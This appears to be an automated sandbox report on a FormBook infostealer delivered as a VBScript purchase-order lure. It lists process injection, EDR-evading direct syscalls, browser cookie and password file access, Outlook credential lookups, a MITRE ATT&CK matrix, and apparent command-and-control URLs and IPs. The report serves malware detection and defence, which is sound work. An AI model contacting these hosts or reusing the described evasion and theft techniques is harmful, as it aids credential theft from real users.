            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Benign windows process drops PE files
            Source: C:\Windows\System32\wscript.exeFile created: x.exe.0.drJump to dropped file
            Allocates memory in foreign processes
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and writeJump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: NULL target: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeSection loaded: NULL target: C:\Windows\SysWOW64\chkntfs.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\chkntfs.exeThread register set: target process: 2300Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\chkntfs.exeThread APC queued: target process: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: FB1008Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
            Source: C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exeProcess created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: JogKDBeJAc.exe, 00000005.00000000.2264864601.0000000001151000.00000002.00000001.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000005.00000002.3304205599.0000000001151000.00000002.00000001.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304116255.00000000016A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: JogKDBeJAc.exe, 00000005.00000000.2264864601.0000000001151000.00000002.00000001.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000005.00000002.3304205599.0000000001151000.00000002.00000001.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304116255.00000000016A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: JogKDBeJAc.exe, 00000005.00000000.2264864601.0000000001151000.00000002.00000001.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000005.00000002.3304205599.0000000001151000.00000002.00000001.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304116255.00000000016A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: JogKDBeJAc.exe, 00000005.00000000.2264864601.0000000001151000.00000002.00000001.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000005.00000002.3304205599.0000000001151000.00000002.00000001.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304116255.00000000016A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000006.00000002.3303203962.0000000002370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2338722204.0000000001810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3306103928.0000000005540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2339680542.0000000001BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2338151410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3304435992.0000000002710000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3304393430.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3304322824.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\chkntfs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000006.00000002.3303203962.0000000002370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2338722204.0000000001810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3306103928.0000000005540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2339680542.0000000001BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2338151410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3304435992.0000000002710000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3304393430.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3304322824.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information221
            Scripting            		Valid Accounts1
            Windows Management Instrumentation            		221
            Scripting            		612
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		211
            Security Software Discovery            		Remote Services1
            Email Collection            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		1
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Data from Local System            		5
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive5
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook612
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Abuse Elevation Control Mechanism            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Obfuscated Files or Information            		Cached Domain Credentials123
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Timestomp            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576423 Sample: PO1341489LTB GROUP.vbs Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 35 www.waytoocool.life 2->35 37 www.timai.shop 2->37 39 6 other IPs or domains 2->39 49 Multi AV Scanner detection for submitted file 2->49 51 Yara detected FormBook 2->51 53 .NET source code contains very large array initializations 2->53 55 3 other signatures 2->55 11 wscript.exe 2 2->11         started        signatures3 process4 file5 33 C:\Users\user\AppData\Local\Temp\x.exe, PE32 11->33 dropped 69 Benign windows process drops PE files 11->69 71 VBScript performs obfuscated calls to suspicious functions 11->71 73 Windows Scripting host queries suspicious COM object (likely to drop second stage) 11->73 15 x.exe 3 11->15         started        signatures6 process7 signatures8 77 Antivirus detection for dropped file 15->77 79 Multi AV Scanner detection for dropped file 15->79 81 Machine Learning detection for dropped file 15->81 83 3 other signatures 15->83 18 aspnet_compiler.exe 15->18         started        process9 signatures10 47 Maps a DLL or memory area into another process 18->47 21 JogKDBeJAc.exe 18->21 injected process11 signatures12 57 Maps a DLL or memory area into another process 21->57 59 Found direct / indirect Syscall (likely to bypass EDR) 21->59 24 chkntfs.exe 13 21->24         started        process13 signatures14 61 Tries to steal Mail credentials (via file / registry access) 24->61 63 Tries to harvest and steal browser information (history, passwords, etc) 24->63 65 Modifies the context of a thread in another process (thread injection) 24->65 67 3 other signatures 24->67 27 JogKDBeJAc.exe 24->27 injected 31 firefox.exe 24->31         started        process15 dnsIp16 41 www.brickhills.site 103.224.182.242, 49805, 49812, 49818 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 27->41 43 www.allstary.top 199.193.6.134, 49879, 49886, 49892 NAMECHEAP-NETUS United States 27->43 45 4 other IPs or domains 27->45 75 Found direct / indirect Syscall (likely to bypass EDR) 27->75 signatures17

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            PO1341489LTB GROUP.vbs26%VirustotalBrowse
            PO1341489LTB GROUP.vbs21%ReversingLabsScript.Trojan.Heuristic

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\x.exe100%AviraTR/Dropper.Gen
            C:\Users\user\AppData\Local\Temp\x.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\x.exe55%ReversingLabsByteCode-MSIL.Backdoor.FormBook

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://park.101datacenter.net/images/vendor-1/google_workspace.png0%Avira URL Cloudsafe
            https://www.101domain.com/brand_services.htm?utm_campaign=parked-page&utm_medium=referral&utm_source0%Avira URL Cloudsafe
            https://park.101datacenter.net/images/vendor-1/trustpilot.svg0%Avira URL Cloudsafe
            http://www.pin-ballerz.net/ocjg/0%Avira URL Cloudsafe
            http://www.timai.shop/xsla/?-V8=hoxAaasoZBOD0j1KZ83XYOlI1AJE1doQvwEl/6A98KlFBwCru8LBuQoutmWPazGrcTbrOkYKG6VMwnANAgx3/U5cHXy83Zs53QS9fb9clXtmfZkgH8FbRqFEUKF+mnaT3w==&2H=b6QHb8C0WpQhtV0%Avira URL Cloudsafe
            https://www.101domain.com/google_workspace.htm?utm_campaign=parked-page&utm_medium=referral&utm_sour0%Avira URL Cloudsafe
            http://www.northidahoscans.online/px.js?ch=20%Avira URL Cloudsafe
            https://www.101domain.com/web_hosting.htm?utm_campaign=parked-page&utm_medium=referral&utm_source=wa0%Avira URL Cloudsafe
            http://www.northidahoscans.online/px.js?ch=10%Avira URL Cloudsafe
            https://my.101domain.com?utm_campaign=parked-page&utm_medium=referral&utm_source=waytoocool.life&utm0%Avira URL Cloudsafe
            http://www.pin-ballerz.net/ocjg/?-V8=PsakXBZzgyoVbyp2hjDhUIAPjymto9iGXnTsMAFbSxg7wqJ/GaGLf9R1SWA0D+LwAwOTNpeqtTSBVw9+2LbbbxVu9AMo8WkIslXiFZquUVbpmyTV+kMBZINqQZENrlqOtg==&2H=b6QHb8C0WpQhtV0%Avira URL Cloudsafe
            https://park.101datacenter.net/css/vendor-1.css?202412090544340%Avira URL Cloudsafe
            https://cs.deviceatlas-cdn.com/101dacs.js0%Avira URL Cloudsafe
            http://www.timai.shop0%Avira URL Cloudsafe
            https://www.101domain.com/domain_monitoring_trademark_enforcement_guide.htm0%Avira URL Cloudsafe
            https://park.101datacenter.net/images/vendor-1/google-reviews.svg0%Avira URL Cloudsafe
            https://park.101datacenter.net/images/vendor-1/icon/101domain.ico0%Avira URL Cloudsafe
            https://www.101domain.com/new_gtld_extensions.htm?utm_campaign=parked-page&utm_medium=referral&utm_s0%Avira URL Cloudsafe
            http://www.brickhills.site/q6c0/?-V8=DNozHXZRHwMop+WB0qwfBKpxfEH+ejoTyKy7EOTXMNRX1xYPjRGOw4JAj4pefwWAxfS0q+PDkH37PQMlxyuVDnop3GMN8cH/UXRq5XDzrWyHO52OJthmQYZMV7gmULD6fQ==&2H=b6QHb8C0WpQhtV0%Avira URL Cloudsafe
            https://park.101datacenter.net/images/vendor-1/com.png0%Avira URL Cloudsafe
            https://www.101domain.com/gmail_email_aliases.htm0%Avira URL Cloudsafe
            https://www.101domain.com/domain-registration.htm?utm_campaign=parked-page&utm_medium=referral&utm_s0%Avira URL Cloudsafe
            http://www.brickhills.site/q6c0/0%Avira URL Cloudsafe
            http://www.waytoocool.life/nydx/0%Avira URL Cloudsafe
            https://park.101datacenter.net/js/jquery-3.6.0.min.js?202412090544340%Avira URL Cloudsafe
            https://www.101domain.com/domain-availability-search.htm?utm_campaign=parked-page&utm_medium=referra0%Avira URL Cloudsafe
            http://www.waytoocool.life/nydx/?-V8=q7nzFJj3afdOFJJfiG7XJfkkRIbmdsBL0Xh9x7HOO1bMwAYpIu+EkXrpUMzqVtVwT+pWdZ8+fZkDpnUDi5L0pxX3zg/WB9ChebFWf29eE9HJh+d3M/EMfjpTQLNaei8vxw==&2H=b6QHb8C0WpQhtV0%Avira URL Cloudsafe
            https://park.101datacenter.net/js/pricing.js?202412090544340%Avira URL Cloudsafe
            https://www.101domain.com/resource_center.htm0%Avira URL Cloudsafe
            https://cs.deviceatlas-cdn.com/smartclick0%Avira URL Cloudsafe
            https://www.101domain.com/external_links.htm0%Avira URL Cloudsafe
            https://park.101datacenter.net/css/fonts/LatoRegular.woff20%Avira URL Cloudsafe
            https://cs.deviceatlas-cdn.com0%Avira URL Cloudsafe
            https://park.101datacenter.net/css/fonts/LatoRegular.woff2)0%Avira URL Cloudsafe
            https://park.101datacenter.net/css/fonts/LatoRegular.woff)0%Avira URL Cloudsafe
            https://park.101datacenter.net0%Avira URL Cloudsafe
            https://www.101domain.com/domain_concierge_service.htm?query=waytoocool.life&utm_campaign=parked-pag0%Avira URL Cloudsafe
            https://park.101datacenter.net/images/vendor-1/park-back.jpg0%Avira URL Cloudsafe
            http://www.brickhills.site/q6c0/?-V8=DNozHXZRHwMop0%Avira URL Cloudsafe
            http://www.northidahoscans.online/sk-logabpstatus.php?a=L2g4bEdyRU15NHN0SHVwVWZwYVdjU3FNL0laQndpc0cz0%Avira URL Cloudsafe
            https://park.101datacenter.net/js/modernizr-webp.js?202412090544340%Avira URL Cloudsafe
            https://park.101datacenter.net/images/vendor-1/park-back.webp0%Avira URL Cloudsafe
            http://www.timai.shop/xsla/0%Avira URL Cloudsafe
            https://park.101datacenter.net/images/vendor-1/101domain-logo.svg0%Avira URL Cloudsafe
            http://www.allstary.top/83oq/?-V8=uON7WwvftimkH6+9fo1haamOfON2rQIMUfJSLV47BI3eNmd69pzs52jdBx/JPqPeVCXck41+K0Sv6SgSfr5VB9MDDVgyHUBPcljHHq+Df2KeZsyLZPWCaDvb78l21qpsnQ==&2H=b6QHb8C0WpQhtV0%Avira URL Cloudsafe
